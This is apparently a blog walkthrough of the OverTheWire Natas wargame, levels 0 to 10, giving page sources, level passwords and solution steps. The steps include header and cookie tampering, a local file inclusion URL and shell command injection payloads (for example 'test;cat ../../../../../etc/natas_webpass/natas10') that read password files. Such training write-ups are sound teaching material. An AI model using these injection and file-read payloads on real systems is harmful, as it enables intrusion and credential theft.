Pages

Thursday, 19 January 2017

Natas Level 0 to 10

This document is for educational purposes only, I take no responsibility for other peoples actions. This is a review of  Natas Level 0 to 10:
http://overthewire.org/wargames/natas/

L 0

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas0", "pass": "natas0" };</script></head>
<body>
<h1>natas0</h1>
<div id="content">
You can find the password for the next level on this page.

<!--The password for natas1 is gtVrDuiDfck831PqWsLEZy5gyDz1clto -->
</div>
</body>
</html>

 L1
 Chrome -> Ctrl+U
 <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas1", "pass": "gtVrDuiDfck831PqWsLEZy5gyDz1clto" };</script></head>
<body oncontextmenu="javascript:alert('right clicking has been blocked!');return false;">
<h1>natas1</h1>
<div id="content">
You can find the password for the
next level on this page, but rightclicking has been blocked!

<!--The password for natas2 is ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi -->
</div>
</body>
</html>

L2
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas2", "pass": "ZluruAthQk7Q2MqmDeTiUij2ZvWy2mBi" };</script></head>
<body>
<h1>natas2</h1>
<div id="content">
There is nothing on this page
<img src="files/pixel.png">
</div>
</body></html>

http://natas.labs.overthewire.org/js/wechall-data.js
var wechalldata = {
    "natas0": 1,
    "natas1": 2,
    "natas2": 3,
    "natas3": 4,
    "natas4": 5,
    "natas5": 6,
    "natas6": 7,
    "natas7": 8,
    "natas8": 15,
    "natas9": 14,
    "natas10": 13,
    "natas11": 12,
    "natas12": 11,
    "natas13": 10,
    "natas14": 9,
    "natas15": 16,
    "natas16": 17,
    "natas17": 18,
    "natas18": 137,
    "natas19": 138,
    "natas20": 139,
    "natas21": 140,
    "natas22": 141,
    "natas23": 142,
    "natas24": 213,
    "natas25": 214,
    "natas26": 215,
    "natas27": 216
}

http://natas2.natas.labs.overthewire.org/files/
[IMG] pixel.png 2016-06-25 11:58 303
[TXT] users.txt 2016-06-25 12:42 145

# username:password
alice:BYNdCesZqW
bob:jw2ueICLvT
charlie:G5vCxkVV3m
natas3:sJIJNW6ucpu6HPZ1ZAchaDtwd7oGrD14
eve:zo4mJWyNj2
mallory:9urtcpzBmH


L3:
User-agent: *
Disallow: /s3cr3t/

http://natas3.natas.labs.overthewire.org//s3cr3t/users.txt
natas4:Z9tkRkWmpt9Qr7XrR5jWRkgOU901swEZ

L4:
Burp -> Proxy -> Intercept On -> Add -> Refferer natas5.natas.labs.overthewire.org

Access granted. The password for natas5 is iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq

L5:
GET / HTTP/1.1
Host: natas5.natas.labs.overthewire.org
Cache-Control: max-age=0
Authorization: Basic bmF0YXM1OmlYNklPZm1wTjdBWU9RR1B3dG4zZlhwYmFKVkpjSGZx
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/55.0.2883.87 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Encoding: gzip, deflate, sdch
Accept-Language: bg,en-US;q=0.8,en;q=0.6
Cookie: __cfduid=ddd2731304b504d954af409bf2c0724731481120164; loggedin=1
DNT: 1
Connection: close

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas5", "pass": "iX6IOfmpN7AYOQGPwtn3fXpbaJVJcHfq" };</script></head>
<body>
<h1>natas5</h1>
<div id="content">
Access granted. The password for natas6 is aGoY4q2Dc6MgDq4oL4YtoKtyAg9PeHa1</div>
</body>
</html>

L6:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas6", "pass": "<censored>" };</script></head>
<body>
<h1>natas6</h1>
<div id="content">

<?

include "includes/secret.inc";

    if(array_key_exists("submit", $_POST)) {
        if($secret == $_POST['secret']) {
        print "Access granted. The password for natas7 is <censored>";
    } else {
        print "Wrong secret";
    }
    }
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

http://natas6.natas.labs.overthewire.org/includes/secret.inc
<?
$secret = "FOEIUWGHFEEUHOFUOIU";
?>

Access granted. The password for natas7 is 7z3hEENjQtflzgnT29q7wAvMNfZdh0i9

L7:

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas7", "pass": "7z3hEENjQtflzgnT29q7wAvMNfZdh0i9" };</script></head>
<body>
<h1>natas7</h1>
<div id="content">

<a href="index.php?page=home">Home</a>
<a href="index.php?page=about">About</a>
<br>
<br>

<!-- hint: password for webuser natas8 is in /etc/natas_webpass/natas8 -->
</div>
</body>
</html>

http://natas7.natas.labs.overthewire.org/index.php?page=/etc/natas_webpass/natas8
DBfUBfqQG69KvJvJ1iAbMoIpwSNQ9bWe

L8:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas8", "pass": "<censored>" };</script></head>
<body>
<h1>natas8</h1>
<div id="content">

<?

$encodedSecret = "3d3d516343746d4d6d6c315669563362";

function encodeSecret($secret) {
    return bin2hex(strrev(base64_encode($secret)));
}

if(array_key_exists("submit", $_POST)) {
    if(encodeSecret($_POST['secret']) == $encodedSecret) {
    print "Access granted. The password for natas9 is <censored>";
    } else {
    print "Wrong secret";
    }
}
?>

<form method=post>
Input secret: <input name=secret><br>
<input type=submit name=submit>
</form>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

echo 3d3d516343746d4d6d6c315669563362 | xxd -r -p | rev | base64 -d

 oubWYf2kBq

 Access granted. The password for natas9 is W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl


 L9:
 <html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "W0mMhUcRRnG8dcghE4qvk3JA9lGt8nDl" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas9", "pass": "<censored>" };</script></head>
<body>
<h1>natas9</h1>
<div id="content">
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    passthru("grep -i $key dictionary.txt");
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

 http://natas9.natas.labs.overthewire.org/dictionary.txt

 test; ls -la ../
 Output:
-rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

../:
total 156
drwxr-xr-x 39 root    root     4096 Jul 10 14:12 .
drwxr-xr-x  5 root    root     4096 Nov 14  2014 ..
drwxr-xr-x  5 root    root     4096 Jun 25  2016 main
drwxr-x---  2 natas0  natas0   4096 Jun 25  2016 natas0
drwxr-x---  2 natas1  natas1   4096 Jun 25  2016 natas1
drwxr-x---  2 natas10 natas10  4096 Jun 25  2016 natas10
drwxr-x---  2 natas11 natas11  4096 Jun 25  2016 natas11
drwxr-x---  3 natas12 natas12  4096 Jun 25  2016 natas12
drwxr-x---  3 natas13 natas13  4096 Jun 25  2016 natas13
drwxr-x---  2 natas14 natas14  4096 Jun 25  2016 natas14
drwxr-x---  2 natas15 natas15  4096 Jun 25  2016 natas15
drwxr-x---  2 natas16 natas16  4096 Jun 25  2016 natas16
drwxr-x---  2 natas17 natas17  4096 Jul 10 14:12 natas17
drwxr-x---  2 natas18 natas18  4096 Jun 25  2016 natas18
drwxr-x---  2 natas19 natas19  4096 Jun 25  2016 natas19
drwxr-x---  3 natas2  natas2   4096 Jun 25  2016 natas2
drwxr-x---  2 natas20 natas20  4096 Jun 25  2016 natas20
drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21
drwxr-x---  2 natas21 natas21  4096 Jun 25  2016 natas21-experimenter
drwxr-x---  2 natas22 natas22  4096 Jun 25  2016 natas22
drwxr-x---  2 natas23 natas23  4096 Jun 25  2016 natas23
drwxr-x---  2 natas24 natas24  4096 Jun 25  2016 natas24
drwxr-x---  3 natas25 natas25  4096 Jun 25  2016 natas25
drwxr-x---  3 natas26 natas26  4096 Jun 25  2016 natas26
drwxr-x---  2 natas27 natas27  4096 Jun 25  2016 natas27
drwxr-x---  2 natas28 natas28  4096 Jun 25  2016 natas28
drwxr-x---  2 natas29 natas29  4096 Jun 25  2016 natas29
drwxr-x---  3 natas3  natas3   4096 Jun 25  2016 natas3
drwxr-x---  2 natas30 natas30  4096 Jun 25  2016 natas30
drwxr-x---  3 natas31 natas31  4096 Jun 25  2016 natas31
drwxr-x---  3 natas32 natas32  4096 Jun 25  2016 natas32
drwxr-x---  2 natas33 natas33  4096 Jun 25  2016 natas33
drwxr-x---  2 natas4  natas4   4096 Jun 25  2016 natas4
drwxr-x---  2 natas5  natas5   4096 Jun 25  2016 natas5
drwxr-x---  3 natas6  natas6   4096 Jun 25  2016 natas6
drwxr-x---  2 natas7  natas7   4096 Jun 25  2016 natas7
drwxr-x---  2 natas8  natas8   4096 Jun 25  2016 natas8
drwxr-x---  2 natas9  natas9   4096 Jun 25  2016 natas9
drwxr-x---  4 root    www-data 4096 Jun 25  2016 stats

test; ls -la ../../../../../-rw-r-----  1 natas9 natas9 460878 Jun 25  2016 dictionary.txt

../../../../../:
total 7965
drwxr-xr-x  26 root root    4096 Mar 13  2016 .
drwxr-xr-x  26 root root    4096 Mar 13  2016 ..
-rw-r--r--   1 root root    2797 Nov  4  2015 README.txt
lrwxrwxrwx   1 root root      15 Nov 14  2014 behemoth -> /games/behemoth
drwxr-xr-x   2 root root    4096 Nov 17 09:14 bin
drwxr-xr-x   2 root root    4096 Apr 20  2014 boot
drwxr-xr-x  12 root root   13680 Dec 23 13:00 dev
drwxr-xr-x   7 root root    4096 Jan 12  2015 drifter
lrwxrwxrwx   1 root root      11 Nov 14  2014 eloi -> /games/eloi
drwxr-xr-x 108 root root    4096 Jan  6 13:46 etc
drwxr-xr-x  11 root root    1024 Mar 18  2015 games
drwxr-xr-x 172 root root    4096 Jul 10 14:12 home
lrwxrwxrwx   1 root root      14 Nov 14  2014 krypton -> /games/krypton
drwxr-xr-x  18 root root    4096 Jun 10  2016 lib
drwxr-xr-x   2 root root    4096 Jun 10  2016 lib32
drwxr-xr-x   2 root root    4096 Jun 10  2016 lib64
drwxr-xr-x   2 root root    4096 Jun 10  2016 libx32
drwx------   2 root root   16384 Apr 20  2014 lost+found
lrwxrwxrwx   1 root root      14 Nov 14  2014 manpage -> /games/manpage
lrwxrwxrwx   1 root root      11 Nov 14  2014 maze -> /games/maze
drwxr-xr-x   3 root root    4096 Apr 20  2014 media
drwxr-xr-x   2 root root    4096 Apr 10  2014 mnt
lrwxrwxrwx   1 root root      13 Nov 14  2014 narnia -> /games/narnia
drwxr-xr-x   2 root root    4096 Apr 16  2014 opt
dr-xr-xr-x 547 root root       0 Dec 23 13:00 proc
drwx------  11 root root    4096 Jul 10 14:12 root
drwxr-xr-x  18 root root     680 Jan  6 20:52 run
drwxr-xr-x   2 root root   12288 Sep 30 13:28 sbin
lrwxrwxrwx   1 root root      13 Nov 14  2014 semtex -> /games/semtex
drwxr-xr-x   2 root root    4096 Apr 16  2014 srv
dr-xr-xr-x  13 root root       0 Dec 23 13:29 sys
drwxrwx-wt   1 root root 8036352 Jan  6 20:52 tmp
drwxr-xr-x  12 root root    4096 Nov 14  2014 usr
lrwxrwxrwx   1 root root      13 Nov 14  2014 utumno -> /games/utumno
drwxr-xr-x  15 root root    4096 Nov 14  2014 var
lrwxrwxrwx   1 root root      13 Nov 14  2014 vortex -> /games/vortex

test;cat ../../../../../README.txt
Output:
             
      ,----..            ,----,          .---.
     /   /   \         ,/   .`|         /. ./|
    /   .     :      ,`   .'  :     .--'.  ' ;
   .   /   ;.  \   ;    ;     /    /__./ \ : |
  .   ;   /  ` ; .'___,/    ,' .--'.  '   \' .
  ;   |  ; \ ; | |    :     | /___/ \ |    ' '
  |   :  | ; | ' ;    |.';  ; ;   \  \;      :
  .   |  ' ' ' : `----'  |  |  \   ;  `      |
  '   ;  \; /  |     '   :  ;   .   \    .\  ;
   \   \  ',  /      |   |  '    \   \   ' \ |
    ;   :    /       '   :  |     :   '  |--"
     \   \ .'        ;   |.'       \   \ ;  
  www. `---` ver     '---' he       '---" ire.org  
             
           
Welcome to the OverTheWire games machine!

If you find any problems, please report them to Steven on
irc.overthewire.org.

--[ Playing the games ]--

  This machine holds several wargames.
  If you are playing "somegame", then:

    * USERNAMES are somegame0, somegame1, ...
    * Most LEVELS are stored in /somegame/.
    * PASSWORDS for each level are stored in /etc/somegame_pass/.

  Write-access to homedirectories is disabled. It is advised to create a
  working directory with a hard-to-guess name in /tmp/.  You can use the
  command "mktemp -d" in order to generate a random and hard to guess
  directory in /tmp/.  Read-access to both /tmp/ and /proc/ is disabled
  so that users can not snoop on eachother.

  Please play nice:
   
    * don't leave orphan processes running
    * don't leave exploit-files laying around
    * don't annoy other players
    * don't post passwords or spoilers
    * again, DONT POST SPOILERS!
      This includes writeups of your solution on your blog or website!

--[ Tips ]--

  This machine has a 64bit processor and many security-features enabled
  by default, although ASLR has been switched off.  The following
  compiler flags might be interesting:

    -m32                    compile for 32bit
    -fno-stack-protector    disable ProPolice
    -Wl,-z,norelro          disable relro

  In addition, the execstack tool can be used to flag the stack as
  executable on ELF binaries.

  Finally, network-access is limited for most levels by a local
  firewall.

--[ Tools ]--

 For your convenience we have installed a few usefull tools which you can find
 in the following locations:

    * peda (https://github.com/longld/peda.git) in /usr/local/peda/
    * gdbinit (https://github.com/gdbinit/Gdbinit) in /usr/local/gdbinit/
    * pwntools (https://github.com/Gallopsled/pwntools) in /usr/src/pwntools/
    * radare2 (http://www.radare.org/) should be in $PATH

--[ More information ]--

  For more information regarding individual wargames, visit
  http://www.overthewire.org/wargames/

  For questions or comments, contact us through IRC on
  irc.overthewire.org.

 test;cat ../../../../../etc/natas_webpass/natas10
 nOpp1igQAkUzaI1GUUjzn1bFVj7xCNzu

 test;cat ../../../../../etc/lsb-release
 DISTRIB_ID=Ubuntu
DISTRIB_RELEASE=14.04
DISTRIB_CODENAME=trusty
DISTRIB_DESCRIPTION="Ubuntu 14.04.5 LTS

L10:
<html>
<head>
<!-- This stuff in the header has nothing to do with the level -->
<link rel="stylesheet" type="text/css" href="http://natas.labs.overthewire.org/css/level.css">
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/jquery-ui.css" />
<link rel="stylesheet" href="http://natas.labs.overthewire.org/css/wechall.css" />
<script src="http://natas.labs.overthewire.org/js/jquery-1.9.1.js"></script>
<script src="http://natas.labs.overthewire.org/js/jquery-ui.js"></script>
<script src=http://natas.labs.overthewire.org/js/wechall-data.js></script><script src="http://natas.labs.overthewire.org/js/wechall.js"></script>
<script>var wechallinfo = { "level": "natas10", "pass": "<censored>" };</script></head>
<body>
<h1>natas10</h1>
<div id="content">

For security reasons, we now filter on certain characters<br/><br/>
<form>
Find words containing: <input name=needle><input type=submit name=submit value=Search><br><br>
</form>


Output:
<pre>
<?
$key = "";

if(array_key_exists("needle", $_REQUEST)) {
    $key = $_REQUEST["needle"];
}

if($key != "") {
    if(preg_match('/[;|&]/',$key)) {
        print "Input contains an illegal character!";
    } else {
        passthru("grep -i $key dictionary.txt");
    }
}
?>
</pre>

<div id="viewsource"><a href="index-source.html">View sourcecode</a></div>
</div>
</body>
</html>

. /etc/natas_webpass/natas11
U82q5TCMMQ9xuFoI3dYX61s7OZD9JKoK

Regards,
Yuriy Stanchev/URIX